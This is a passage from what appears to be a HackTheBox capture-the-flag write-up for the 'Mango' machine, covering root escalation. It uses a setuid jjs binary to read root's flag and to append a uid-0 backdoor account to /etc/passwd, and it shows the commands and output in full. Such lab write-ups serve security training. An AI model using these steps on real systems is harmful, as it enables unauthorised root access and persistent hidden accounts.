<p>As a reminder:</p>
<blockquote>
<p>Binaries with the setuid bit enabled, are being executed as if they were running under the context of the root user. This enables normal (non-privileged) users to use special privileges, like opening sockets. While this seems unnecessary for a normal user, it is actually needed for simple commands like ping.</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">admin@mango:/$ find / -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br><span class="line">[...]</span><br><span class="line">/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs</span><br></pre></td></tr></table></figure>

<p>This <code>jjs</code>  binary catch my eye because it’s not common to see it having the setuid bit. If you wonder what <code>jjs</code> stands for, it stands for <strong>J</strong>ava <strong>J</strong>ava<strong>S</strong>cript. </p>
<h3 id="jjs-setuid-exploitation"><a href="#jjs-setuid-exploitation" class="headerlink" title="jjs setuid exploitation"></a>jjs setuid exploitation</h3><p>Let’s search online to see if we can do something with this <code>jjs</code> binary. My favorite resource is <a target="_blank" rel="noopener" href="https://gtfobins.github.io/"><code>GTFOBins</code></a>.</p>
<blockquote>
<p>GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.</p>
<p>The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.</p>
</blockquote>
<p>According to it, <code>jjs</code> could be used to execute commands, read and write file. Sounds incredibly useful for us especially since the setuid is set meaning the command will be ran as <code>root</code>. </p>
<p>Let’s give it a try to read the <code>root.txt</code> flag:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">admin@mango:/$ <span class="built_in">echo</span> <span class="string">&#x27;var BufferedReader = Java.type(&quot;java.io.BufferedReader&quot;);</span></span><br><span class="line"><span class="string">&gt; var FileReader = Java.type(&quot;java.io.FileReader&quot;);</span></span><br><span class="line"><span class="string">&gt; var br = new BufferedReader(new FileReader(&quot;/root/root.txt&quot;));</span></span><br><span class="line"><span class="string">&gt; while ((line = br.readLine()) != null) &#123; print(line); &#125;&#x27;</span> | jjs</span><br><span class="line">Warning: The jjs tool is planned to be removed from a future JDK release</span><br><span class="line">jjs&gt; var BufferedReader = Java.type(<span class="string">&quot;java.io.BufferedReader&quot;</span>);</span><br><span class="line">jjs&gt; var FileReader = Java.type(<span class="string">&quot;java.io.FileReader&quot;</span>);</span><br><span class="line">jjs&gt; var br = new BufferedReader(new FileReader(<span class="string">&quot;/root/root.txt&quot;</span>));</span><br><span class="line">jjs&gt; <span class="keyword">while</span> ((line = br.readLine()) != null) &#123; <span class="built_in">print</span>(line); &#125;</span><br><span class="line">8xxxxxxxxxxxxxxxxxxxxxx5</span><br></pre></td></tr></table></figure>

<p>So we got the root flag! But this not fun enough right ? It would be better to login as root.</p>
<p>To do so I am going to show an alternative method from the usual SSH key retrieval/adding I usually use. </p>
<p>This time we are going to add a new root account to the box by adding a new line to the <code>/etc/passwd</code> file. </p>
<p>First let’s generate the hash of our password: </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">admin@mango:/$ openssl passwd -1</span><br><span class="line">Password:</span><br><span class="line">Verifying - Password:</span><br><span class="line">$1$3H6dixbQ<span class="variable">$xxxxxxxxxxxxj7TueW</span>/J.</span><br></pre></td></tr></table></figure>

<p>We are going to add a new user called <code>hg8</code> with the the uid <code>0</code> (to be root) to the <code>passwd</code> file with the following line:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hg8:$1$3H6dixbQ<span class="variable">$xxxxxxxxxxxxj7TueW</span>/J.:0:0:root:/root:/bin/bash</span><br></pre></td></tr></table></figure>

<p>Now let’s use the <code>jjs</code> binary to write to <code>/etc/passwd</code> file as root, let’s tweak the example shown on <a target="_blank" rel="noopener" href="https://gtfobins.github.io/"><code>GTFOBins</code></a> to append data to a file instead of creating a new one and let’s go:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">admin@mango:/$ jjs</span><br><span class="line">jjs&gt; var FileWriter = Java.type(<span class="string">&quot;java.io.FileWriter&quot;</span>);</span><br><span class="line">jjs&gt; var fw=new FileWriter(<span class="string">&quot;/etc/passwd&quot;</span>, <span class="literal">true</span>);</span><br><span class="line">jjs&gt; fw.write(<span class="string">&quot;hg8:$1$3H6dixbQ<span class="variable">$xxxxxxxxxxxxj7TueW</span>/J.:0:0:root:/root:/bin/bash\n&quot;</span>);</span><br><span class="line">jjs&gt; fw.close();</span><br><span class="line">jjs&gt; </span><br><span class="line">admin@mango:/home/admin$ </span><br></pre></td></tr></table></figure>

<p>Let’s verify it worked and login as our new user :</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">admin@mango:/$ cat /etc/passwd</span><br><span class="line">[...]</span><br><span class="line">hg8:$1$/k0hFNSh<span class="variable">$HKqgKcpLRBVVv8bY1wfv3</span>.:0:0:root:/root:/bin/bash</span><br><span class="line">admin@mango:/$ su - hg8</span><br><span class="line">Password:</span><br><span class="line">root@mango:~<span class="comment"># id</span></span><br><span class="line">uid=0(root) gid=0(root) groups=0(root)</span><br><span class="line">root@mango:~<span class="comment"># cat root.txt</span></span><br><span class="line">8xxxxxxxxxxxxxxxxxxxxxxxxxxx5</span><br></pre></td></tr></table></figure>

<p>Now that we are root and done let’s not forget to clean up our changes to not spoil other users!</p>
<hr>
<p>As always do not hesitate to contact me for any questions or feedbacks ;)</p>
<p>See you next time !</p>
<p>-hg8</p>

  </div>
</article>
<br>
<br>


    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/CTF/">CTF</a> › <a class="category-link" href="/categories/CTF/HackTheBox/">HackTheBox</a> › <a class="category-link" href="/categories/CTF/HackTheBox/Medium-Box/">Medium Box</a>
    </div>



    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/gtfobins/" rel="tag">gtfobins</a>, <a class="tag-link-link" href="/tags/linux/" rel="tag">linux</a>, <a class="tag-link-link" href="/tags/mango/" rel="tag">mango</a>, <a class="tag-link-link" href="/tags/mongodb/" rel="tag">mongodb</a>, <a class="tag-link-link" href="/tags/nosql-injection/" rel="tag">nosql injection</a>, <a class="tag-link-link" href="/tags/setuid/" rel="tag">setuid</a>
    </div>





        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#User-Flag"><span class="toc-number">1.</span> <span class="toc-text">User Flag</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon"><span class="toc-number">1.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#NoSQL-Injection"><span class="toc-number">1.2.</span> <span class="toc-text">NoSQL Injection</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Blind-NoSQL-data-extract"><span class="toc-number">1.3.</span> <span class="toc-text">Blind NoSQL data extract</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Pivot-mango-gt-admin"><span class="toc-number">1.4.</span> <span class="toc-text">Pivot mango -&gt; admin</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Root-Flag"><span class="toc-number">2.</span> <span class="toc-text">Root Flag</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon-1"><span class="toc-number">2.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#jjs-setuid-exploitation"><span class="toc-number">2.2.</span> <span class="toc-text">jjs setuid exploitation</span></a></li></ol></li></ol>
    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024
    <a href="https://hg8.sh">hg8.sh</a>
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Archives</a></li>
         
          <li><a href="/categories/">Category</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/atom.xml">RSS</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


    
<script src="/lib/jquery/jquery.min.js"></script>


<script src="/js/main.js"></script>




</body>
</html>
